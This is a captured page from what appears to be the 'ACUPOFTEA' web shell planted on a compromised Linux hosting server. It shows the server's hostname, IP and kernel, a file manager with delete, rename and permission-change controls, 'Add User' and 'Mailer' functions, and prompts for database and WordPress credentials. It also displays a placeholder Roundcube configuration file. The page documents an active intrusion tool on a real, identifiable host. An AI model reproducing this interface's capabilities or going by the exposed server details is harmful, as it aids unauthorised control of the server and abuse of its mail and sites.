System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
var
/
softaculous
/
roundcube
/
216.73.216.50
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
config.inc.php
<?php /* Local configuration for Roundcube Webmail */ // ---------------------------------- // SQL DATABASE // ---------------------------------- // Database connection string (DSN) for read+write operations // Format (compatible with PEAR MDB2): db_provider://user:password@host/database // Currently supported db_providers: mysql, pgsql, sqlite, mssql, sqlsrv, oracle // For examples see https://pear.php.net/manual/en/package.database.mdb2.intro-dsn.php // Note: for SQLite use absolute path (Linux): 'sqlite:////full/path/to/sqlite.db?mode=0646' // or (Windows): 'sqlite:///C:/full/path/to/sqlite.db' // Note: Various drivers support various additional arguments for connection, // for Mysql: key, cipher, cert, capath, ca, verify_server_cert, // for Postgres: application_name, sslmode, sslcert, sslkey, sslrootcert, sslcrl, sslcompression, service. // e.g. 'mysql://roundcube:@localhost/roundcubemail?verify_server_cert=false' $config['db_dsnw'] = 'mysql://[[softdbuser]]:[[softdbpass]]@[[softdbhost]]/[[softdb]]'; // you can define specific table (and sequence) names prefix $config['db_prefix'] = '[[dbprefix]]'; // ---------------------------------- // IMAP // ---------------------------------- // The IMAP host (and optionally port number) chosen to perform the log-in. // Leave blank to show a textbox at login, give a list of hosts // to display a pulldown menu or set one host as string. // Enter hostname with prefix ssl:// to use Implicit TLS, or use // prefix tls:// to use STARTTLS. // If port number is omitted it will be set to 993 (for ssl://) or 143 otherwise. // Supported replacement variables: // %n - hostname ($_SERVER['SERVER_NAME']) // %t - hostname without the first part // %d - domain (http hostname $_SERVER['HTTP_HOST'] without the first part) // %s - domain name after the '@' from e-mail address provided at login screen // For example %n = mail.domain.tld, %t = domain.tld // WARNING: After hostname change update of mail_host column in users table is // required to match old user data records with the new host. $config['imap_host'] = '[[imap]]:[[imap_port]]'; // ---------------------------------- // SMTP // ---------------------------------- // SMTP server host (and optional port number) for sending mails. // Enter hostname with prefix ssl:// to use Implicit TLS, or use // prefix tls:// to use STARTTLS. // If port number is omitted it will be set to 465 (for ssl://) or 587 otherwise. // Supported replacement variables: // %h - user's IMAP hostname // %n - hostname ($_SERVER['SERVER_NAME']) // %t - hostname without the first part // %d - domain (http hostname $_SERVER['HTTP_HOST'] without the first part) // %z - IMAP domain (IMAP hostname without the first part) // For example %n = mail.domain.tld, %t = domain.tld // To specify different SMTP servers for different IMAP hosts provide an array // of IMAP host (no prefix or port) and SMTP server e.g. ['imap.example.com' => 'smtp.example.net'] $config['smtp_host'] = '[[smtp]]:[[smtp_port]]'; // provide an URL where a user can get support for this Roundcube installation // PLEASE DO NOT LINK TO THE ROUNDCUBE.NET WEBSITE HERE! $config['support_url'] = '[[softurl]]'; // This key is used for encrypting purposes, like storing of imap password // in the session. For historical reasons it's called DES_key, but it's used // with any configured cipher_method (see below). // For the default cipher_method a required key length is 24 characters. $config['des_key'] = '[[des_key]]'; // Name your service. This is displayed on the login screen and in the window title $config['product_name'] = '[[site_name]]'; // ---------------------------------- // PLUGINS // ---------------------------------- // List of active plugins (in plugins/ directory) $config['plugins'] = []; // the default locale setting (leave empty for auto-detection) // RFC1766 formatted language name like en_US, de_DE, de_CH, fr_FR, pt_BR $config['language'] = '[[language]]';
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-06-03 09:39:27
..
DIR
-
drwxr-xr-x
2025-10-28 09:39:31
images
DIR
-
drwxr-xr-x
2025-06-03 09:39:27
php53
DIR
-
drwxr-xr-x
2025-06-03 09:39:27
php56
DIR
-
drwxr-xr-x
2025-06-03 09:39:27
php71
DIR
-
drwxr-xr-x
2025-06-03 09:39:27
php81
DIR
-
drwxr-xr-x
2025-06-03 09:39:27
php82
DIR
-
drwxr-xr-x
2025-06-03 09:39:27
changelog.txt
text/plain
3.51 KB
-rw-r--r--
2025-06-02 05:39:52
clone.php
text/x-php
3.39 KB
-rw-r--r--
2025-06-02 07:54:14
config.inc.php
text/x-php
3.9 KB
-rw-r--r--
2025-02-10 04:28:38
fileindex.php
text/plain
203 B
-rw-r--r--
2021-12-23 06:54:36
import.php
text/x-php
3.3 KB
-rw-r--r--
2025-06-02 07:54:14
info.xml
text/html
2.94 KB
-rw-r--r--
2025-06-02 05:39:52
install.js
text/plain
1.25 KB
-rw-r--r--
2021-12-23 06:54:36
install.php
text/x-php
6.54 KB
-rw-r--r--
2025-06-02 07:54:14
install.xml
text/html
3.73 KB
-rw-r--r--
2021-12-23 06:54:36
md5
text/plain
2.2 KB
-rw-r--r--
2025-06-02 07:54:14
notes.txt
text/plain
1.23 KB
-rw-r--r--
2023-07-03 06:47:16
remove.php
text/x-php
3.11 KB
-rw-r--r--
2025-06-02 07:54:14
upgrade.php
text/x-php
7.04 KB
-rw-r--r--
2025-06-02 07:54:14
upgrade.xml
text/plain
341 B
-rw-r--r--
2021-12-23 06:54:36
~ ACUPOFTEA - mail.ontime-ae.com